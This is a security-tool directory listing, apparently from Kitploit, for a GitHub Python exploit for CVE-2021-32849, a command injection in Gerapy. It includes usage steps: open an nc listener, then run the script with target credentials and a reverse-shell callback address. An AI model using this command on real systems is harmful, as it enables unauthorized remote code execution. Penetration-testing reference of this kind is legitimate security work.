Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2021-32849 — Python exploit for CVE-2021-32849, a command injection in Gerapy, enabling remote code execution with reverse shell. | Kitploit
工具/GitHubGitHub/lowkey0808/cve-2021-32849
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHublowkey0808/cve-2021-32849

cve-2021-32849

Python exploit for CVE-2021-32849, a command injection in Gerapy, enabling remote code execution with reverse shell.

查看仓库
24年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

cve-2021-32849

cve-2021-32849(gerapy命令执行)

使用方式

先开启一个nc进行监听,再用exp去打

root@kitploit:~
python3 CVE-2021-32849.py -u http://192.168.1.69:8000 -U admin -P admin@123 -r 10.10.16.34 -p 8888 -c id

图片

下载工具